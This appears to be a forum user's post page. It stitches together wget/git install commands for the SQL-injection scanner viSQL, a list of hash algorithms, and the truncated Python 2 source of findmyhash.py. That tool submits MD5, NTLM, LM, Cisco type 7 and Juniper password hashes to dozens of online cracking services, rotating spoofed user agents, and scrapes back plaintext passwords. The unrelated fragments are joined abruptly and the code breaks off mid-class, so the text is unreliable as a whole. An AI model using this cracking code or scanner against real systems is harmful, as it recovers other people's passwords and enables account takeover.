Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
*** Automatic Installation
~$ wget https://raw.githubusercontent.com/blackvkng/viSQL/master/installer.py
~# python2 installer.py
~$ # Type "viSQL" to use tool.
~$ viSQL
*** Manual Installation
~$ git clone https://github.com/blackvkng/viSQL.git
~$ cd viSQL
~# python2 -m pip install -r requirements.txt
~$ python2 viSQL.py --help
MD4 - RFC 1320
MD5 - RFC 1321
SHA1 - RFC 3174 (FIPS 180-3)
SHA224 - RFC 3874 (FIPS 180-3)
SHA256 - FIPS 180-3
SHA384 - FIPS 180-3
SHA512 - FIPS 180-3
RMD160 - RFC 2857
GOST - RFC 5831
WHIRLPOOL - ISO/IEC 10118-3:2004
LM - Microsoft Windows hash
NTLM - Microsoft Windows hash
MYSQL - MySQL 3, 4, 5 hash
CISCO7 - Cisco IOS type 7 encrypted passwords
JUNIPER - Juniper Networks $9$ encrypted passwords
LDAP_MD5 - MD5 Base64 encoded
LDAP_SHA1 - SHA1 Base64 encoded
# -*- coding: iso-8859-1 -*-
########################################################################################################
### LICENSE
########################################################################################################
#
# findmyhash.py - v 1.1.2
#
# This script is under GPL v3 License (http://www.gnu.org/licenses/gpl-3.0.html).
#
# Only this source code is under GPL v3 License. Web services used in this script are under
# different licenses.
#
# If you know some clause in one of these web services which forbids to use it inside this script,
# please contact me to remove the web service as soon as possible.
#
# Developed by JulGor ( http://laxmarcaellugar.blogspot.com/ )
# Mail: bloglaxmarcaellugar AT gmail DOT com
# twitter: @laXmarcaellugar
#
########################################################################################################
### IMPORTS
########################################################################################################
try:
import sys
import hashlib
import urllib2
import getopt
from os import path
from urllib import urlencode
from re import search, findall
from random import seed, randint
from base64 import decodestring, encodestring
from cookielib import LWPCookieJar
except:
print """
Execution error:
You required some basic Python libraries.
This application use: sys, hashlib, urllib, urllib2, os, re, random, getopt, base64 and cookielib.
Please, check if you have all of them installed in your system.
"""
sys.exit(1)
try:
from httplib2 import Http
except:
print """
Execution error:
The Python library httplib2 is not installed in your system.
Please, install it before use this application.
"""
sys.exit(1)
try:
from libxml2 import parseDoc
except:
print """
Execution error:
The Python library libxml2 is not installed in your system.
Because of that, some plugins aren't going to work correctly.
Please, install it before use this application.
"""
########################################################################################################
### CONSTANTS
########################################################################################################
MD4 = "md4"
MD5 = "md5"
SHA1 = "sha1"
SHA224 = "sha224"
SHA256 = "sha256"
SHA384 = "sha384"
SHA512 = "sha512"
RIPEMD = "rmd160"
LM = "lm"
NTLM = "ntlm"
MYSQL = "mysql"
CISCO7 = "cisco7"
JUNIPER = "juniper"
GOST = "gost"
WHIRLPOOL = "whirlpool"
LDAP_MD5 = "ldap_md5"
LDAP_SHA1 = "ldap_sha1"
USER_AGENTS = [
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 1.0.5)",
"curl/7.7.2 (powerpc-apple-darwin6.0) libcurl 7.7.2 (OpenSSL 0.9.6b)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101213 Firefox/4.0b8pre",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) chromeframe/10.0.648.205",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)",
"Opera/9.80 (Windows NT 6.1; U; sv) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.7.62 Version/11.00",
"Opera/9.80 (X11; Linux i686; U; pl) Presto/2.6.30 Version/10.61",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.872.0 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.812.0 Safari/535.1",
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
]
########################################################################################################
### CRACKERS DEFINITION
########################################################################################################
class SCHWETT:
name = "schwett"
url = "http://schwett.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://schwett.com/md5/index.php?md5value=%s&md5c=Hash+Match" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r"<h3><font color='red'>No Match Found</font></h3><br />", html)
if match:
return None
else:
return "The hash is broken, please contact with La X marca el lugar and send it the hash value to add the correct regexp."
class NETMD5CRACK:
name = "netmd5crack"
url = "http://www.netmd5crack.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://www.netmd5crack.com/cgi-bin/Crack.py?InputHash=%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
regexp = r'<tr><td class="border">%s</td><td class="border">[^<]*</td></tr></table>' % (hashvalue)
match = search (regexp, html)
if match:
match2 = search ( "Sorry, we don't have that hash in our database", match.group() )
if match2:
return None
else:
return match.group().split('border')[2].split('<')[0][2:]
class MD5_CRACKER:
name = "md5-cracker"
url = "http://www.md5-cracker.tk"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://www.md5-cracker.tk/xml.php?md5=%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
if response:
try:
doc = parseDoc ( response.read() )
except:
print "INFO: You need libxml2 to use this plugin."
return None
else:
return None
result = doc.xpathEval("//data")
if len(result):
return result[0].content
else:
return None
class BENRAMSEY:
name = "benramsey"
url = "http://tools.benramsey.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://tools.benramsey.com/md5/md5.php?hash=%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<string><!\[CDATA\[[^\]]*\]\]></string>', html)
if match:
return match.group().split(']')[0][17:]
else:
return None
class GROMWEB:
name = "gromweb"
url = "http://md5.gromweb.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://md5.gromweb.com/query/%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
if response:
return response.read()
return response
class HASHCRACKING:
name = "hashcracking"
url = "http://md5.hashcracking.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://md5.hashcracking.com/search.php?md5=%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'\sis.*', html)
if match:
return match.group()[4:]
return None
class VICTOROV:
name = "hashcracking"
url = "http://victorov.su"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://victorov.su/md5/?md5e=&md5d=%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r': <b>[^<]*</b><br><form action="">', html)
if match:
return match.group().split('b>')[1][:-2]
return None
class THEKAINE:
name = "thekaine"
url = "http://md5.thekaine.de"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://md5.thekaine.de/?hash=%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<td colspan="2"><br><br><b>[^<]*</b></td><td></td>', html)
if match:
match2 = search (r'not found', match.group() )
if match2:
return None
else:
return match.group().split('b>')[1][:-2]
class TMTO:
name = "tmto"
url = "http://www.tmto.org"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://www.tmto.org/api/latest/?hash=%s&auth=true" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'text="[^"]+"', html)
if match:
return decodestring(match.group().split('"')[1])
else:
return None
class MD5_DB:
name = "md5-db"
url = "http://md5-db.de"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://md5-db.de/%s.html" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
if not response:
return None
html = None
if response:
html = response.read()
else:
return None
match = search (r'<strong>Es wurden 1 m.gliche Begriffe gefunden, die den Hash \w* verwenden:</strong><ul><li>[^<]*</li>', html)
if match:
return match.group().split('li>')[1][:-2]
else:
return None
class MY_ADDR:
name = "my-addr"
url = "http://md5.my-addr.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php"
# Build the parameters
params = { "md5" : hashvalue,
"x" : 21,
"y" : 8 }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r"<span class='middle_title'>Hashed string</span>: [^<]*</div>", html)
if match:
return match.group().split('span')[2][3:-6]
else:
return None
class MD5PASS:
name = "md5pass"
url = "http://md5pass.info"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = self.url
# Build the parameters
params = { "hash" : hashvalue,
"get_pass" : "Get Pass" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r"Password - <b>[^<]*</b>", html)
if match:
return match.group().split('b>')[1][:-2]
else:
return None
class MD5DECRYPTION:
name = "md5decryption"
url = "http://md5decryption.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = self.url
# Build the parameters
params = { "hash" : hashvalue,
"submit" : "Decrypt It!" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r"Decrypted Text: </b>[^<]*</font>", html)
if match:
return match.group().split('b>')[1][:-7]
else:
return None
class MD5CRACK:
name = "md5crack"
url = "http://md5crack.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://md5crack.com/crackmd5.php"
# Build the parameters
params = { "term" : hashvalue,
"crackbtn" : "Crack that hash baby!" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'Found: md5\("[^"]+"\)', html)
if match:
return match.group().split('"')[1]
else:
return None
class MD5ONLINE:
name = "md5online"
url = "http://md5online.net"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = self.url
# Build the parameters
params = { "pass" : hashvalue,
"option" : "hash2text",
"send" : "Submit" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<center><p>md5 :<b>\w*</b> <br>pass : <b>[^<]*</b></p></table>', html)
if match:
return match.group().split('b>')[3][:-2]
else:
return None
class MD5_DECRYPTER:
name = "md5-decrypter"
url = "http://md5-decrypter.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = self.url
# Build the parameters
params = { "data[Row][cripted]" : hashvalue }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = findall (r'<b class="res">[^<]*</b>', html)
if match:
return match[1].split('>')[1][:-3]
else:
return None
class AUTHSECUMD5:
name = "authsecu"
url = "http://www.authsecu.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://www.authsecu.com/decrypter-dechiffrer-cracker-hash-md5/script-hash-md5.php"
# Build the parameters
params = { "valeur_bouton" : "dechiffrage",
"champ1" : "",
"champ2" : hashvalue,
"dechiffrer.x" : "78",
"dechiffrer.y" : "7" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = findall (r'<td><p class="chapitre---texte-du-tableau-de-niveau-1">[^<]*</p></td>', html)
if len(match) > 2:
return match[1].split('>')[2][:-3]
else:
return None
class HASHCRACK:
name = "hashcrack"
url = "http://hashcrack.com"
supported_algorithm = [MD5, SHA1, MYSQL, LM, NTLM]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = "http://hashcrack.com/indx.php"
hash2 = None
if alg in [LM, NTLM] and ':' in hashvalue:
if alg == LM:
hash2 = hashvalue.split(':')[0]
else:
hash2 = hashvalue.split(':')[1]
else:
hash2 = hashvalue
# Delete the possible starting '*'
if alg == MYSQL and hash2[0] == '*':
hash2 = hash2[1:]
# Build the parameters
params = { "auth" : "8272hgt",
"hash" : hash2,
"string" : "",
"Submit" : "Submit" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<div align=center>"[^"]*" resolves to</div><br><div align=center> <span class=hervorheb2>[^<]*</span></div></TD>', html)
if match:
return match.group().split('hervorheb2>')[1][:-18]
else:
return None
class OPHCRACK:
name = "ophcrack"
url = "http://www.objectif-securite.ch"
supported_algorithm = [LM, NTLM]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Check if hashvalue has the character ':'
if ':' not in hashvalue:
return None
# Ophcrack doesn't crack NTLM hashes. It needs a valid LM hash and this one is an empty hash.
if hashvalue.split(':')[0] == "aad3b435b51404eeaad3b435b51404ee":
return None
# Build the URL and the headers
url = "http://www.objectif-securite.ch/en/products.php?hash=%s" % (hashvalue.replace(':', '%3A'))
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<table><tr><td>Hash:</td><td>[^<]*</td></tr><tr><td><b>Password:</b></td><td><b>[^<]*</b></td>', html)
if match:
return match.group().split('b>')[3][:-2]
else:
return None
class C0LLISION:
name = "c0llision"
url = "http://www.c0llision.net"
supported_algorithm = [MD5, LM, NTLM]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Check if hashvalue has the character ':'
if alg in [LM, NTLM] and ':' not in hashvalue:
return None
# Look for "hash[_csrf_token]" parameter
response = do_HTTP_request ( "http://www.c0llision.net/webcrack.php" )
html = None
if response:
html = response.read()
else:
return None
match = search (r'<input type="hidden" name="hash._csrf_token." value="[^"]*" id="hash__csrf_token" />', html)
token = None
if match:
token = match.group().split('"')[5]
# Build the URL
url = "http://www.c0llision.net/webcrack/request"
# Build the parameters
params = { "hash[_input_]" : hashvalue,
"hash[_csrf_token]" : token }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = None
if alg in [LM, NTLM]:
html = html.replace('\n', '')
result = ""
match = search (r'<table class="pre">.*?</table>', html)
if match:
try:
doc = parseDoc ( match.group() )
except:
print "INFO: You need libxml2 to use this plugin."
return None
lines = doc.xpathEval("//tr")
for l in lines:
doc = parseDoc ( str(l) )
cols = doc.xpathEval("//td")
if len(cols) < 4:
return None
if cols[2].content:
result = " > %s (%s) = %s\n" % ( cols[1].content, cols[2].content, cols[3].content )
#return ( result and "\n" + result or None )
return ( result and result.split()[-1] or None )
else:
match = search (r'<td class="plaintext">[^<]*</td>', html)
if match:
return match.group().split('>')[1][:-4]
return None
class REDNOIZE:
name = "rednoize"
url = "http://md5.rednoize.com"
supported_algorithm = [MD5, SHA1]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL
url = ""
if alg == MD5:
url = "http://md5.rednoize.com/?p&s=md5&q=%s&_=" % (hashvalue)
else:
url = "http://md5.rednoize.com/?p&s=sha1&q=%s&_=" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
return html
class CMD5:
name = "cmd5"
url = "http://www.cmd5.org"
supported_algorithm = [MD5, NTLM]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Look for hidden parameters
response = do_HTTP_request ( "http://www.cmd5.org/" )
html = None
if response:
html = response.read()
else:
return None
match = search (r'<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="[^"]*" />', html)
viewstate = None
if match:
viewstate = match.group().split('"')[7]
match = search (r'<input type="hidden" name="ctl00.ContentPlaceHolder1.HiddenField1" id="ctl00_ContentPlaceHolder1_HiddenField1" value="[^"]*" />', html)
ContentPlaceHolder1 = ""
if match:
ContentPlaceHolder1 = match.group().split('"')[7]
match = search (r'<input type="hidden" name="ctl00.ContentPlaceHolder1.HiddenField2" id="ctl00_ContentPlaceHolder1_HiddenField2" value="[^"]*" />', html)
ContentPlaceHolder2 = ""
if match:
ContentPlaceHolder2 = match.group().split('"')[7]
# Build the URL
url = "http://www.cmd5.org/"
hash2 = ""
if alg == MD5:
hash2 = hashvalue
else:
if ':' in hashvalue:
hash2 = hashvalue.split(':')[1]
# Build the parameters
params = { "__EVENTTARGET" : "",
"__EVENTARGUMENT" : "",
"__VIEWSTATE" : viewstate,
"ctl00$ContentPlaceHolder1$TextBoxq" : hash2,
"ctl00$ContentPlaceHolder1$InputHashType" : alg,
"ctl00$ContentPlaceHolder1$Button1" : "decrypt",
"ctl00$ContentPlaceHolder1$HiddenField1" : ContentPlaceHolder1,
"ctl00$ContentPlaceHolder1$HiddenField2" : ContentPlaceHolder2 }
header = { "Referer" : "http://www.cmd5.org/" }
# Make the request
response = do_HTTP_request ( url, params, header )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<span id="ctl00_ContentPlaceHolder1_LabelResult">[^<]*</span>', html)
if match:
return match.group().split('>')[1][:-6]
else:
return None
class AUTHSECUCISCO7:
name = "authsecu"
url = "http://www.authsecu.com"
supported_algorithm = [CISCO7]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL and the headers
url = "http://www.authsecu.com/decrypter-dechiffrer-cracker-password-cisco-7/script-password-cisco-7-launcher.php"
# Build the parameters
params = { "valeur_bouton" : "dechiffrage",
"champ1" : hashvalue,
"dechiffrer.x" : 43,
"dechiffrer.y" : 16 }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = findall (r'<td><p class="chapitre---texte-du-tableau-de-niveau-1">[^<]*</p></td>', html)
if match:
return match[1].split('>')[2][:-3]
else:
return None
class CACIN:
name = "cacin"
url = "http://cacin.net"
supported_algorithm = [CISCO7]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL and the headers
url = "http://cacin.net/cgi-bin/decrypt-cisco.pl?cisco_hash=%s" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<tr>Cisco password 7: [^<]*</tr><br><tr><th><br>Decrypted password: .*', html)
if match:
return match.group().split(':')[2][1:]
else:
return None
class IBEAST:
name = "ibeast"
url = "http://www.ibeast.com"
supported_algorithm = [CISCO7]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL and the headers
url = "http://www.ibeast.com/content/tools/CiscoPassword/decrypt.php?txtPassword=%s&submit1=Enviar+consulta" % (hashvalue)
# Make the request
response = do_HTTP_request ( url )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<font size="\+2">Your Password is [^<]*<br>', html)
if match:
return match.group().split('is ')[1][:-4]
else:
return None
class PASSWORD_DECRYPT:
name = "password-decrypt"
url = "http://password-decrypt.com"
supported_algorithm = [CISCO7, JUNIPER]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL and the parameters
url = ""
params = None
if alg == CISCO7:
url = "http://password-decrypt.com/cisco.cgi"
params = { "submit" : "Submit",
"cisco_password" : hashvalue,
"submit" : "Submit" }
else:
url = "http://password-decrypt.com/juniper.cgi"
params = { "submit" : "Submit",
"juniper_password" : hashvalue,
"submit" : "Submit" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'Decrypted Password: <B>[^<]*</B> </p>', html)
if match:
return match.group().split('B>')[1][:-2]
else:
return None
class BIGTRAPEZE:
name = "bigtrapeze"
url = "http://www.bigtrapeze.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL and the headers
url = "http://www.bigtrapeze.com/md5/index.php"
# Build the parameters
params = { "query" : hashvalue,
" Crack " : "Enviar consulta" }
# Build the Headers with a random User-Agent
headers = { "User-Agent" : USER_AGENTS[randint(0, len(USER_AGENTS))-1] }
# Make the request
response = do_HTTP_request ( url, params, headers )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'Congratulations!<li>The hash <strong>[^<]*</strong> has been deciphered to: <strong>[^<]*</strong></li>', html)
if match:
return match.group().split('strong>')[3][:-2]
else:
return None
class HASHCHECKER:
name = "hashchecker"
url = "http://www.hashchecker.com"
supported_algorithm = [MD5]
def isSupported (self, alg):
"""Return True if HASHCRACK can crack this type of algorithm and
False if it cannot."""
if alg in self.supported_algorithm:
return True
else:
return False
def crack (self, hashvalue, alg):
"""Try to crack the hash.
@param hashvalue Hash to crack.
@param alg Algorithm to crack."""
# Check if the cracker can crack this kind of algorithm
if not self.isSupported (alg):
return None
# Build the URL and the headers
url = "http://www.hashchecker.com/index.php"
# Build the parameters
params = { "search_field" : hashvalue,
"Submit" : "search" }
# Make the request
response = do_HTTP_request ( url, params )
# Analyze the response
html = None
if response:
html = response.read()
else:
return None
match = search (r'<td><li>Your md5 hash is :<br><li>[^\s]* is <b>[^<]*</b> used charlist :2</td>', html)
if match:
return match.group().split('b>')[1][:-2]
else:
return None
class MD5HASHCRACKER:
name = "md5hashcracker"
url = "http://md5hashcracker.appspot.com"
supported_algorithm = [MD5]
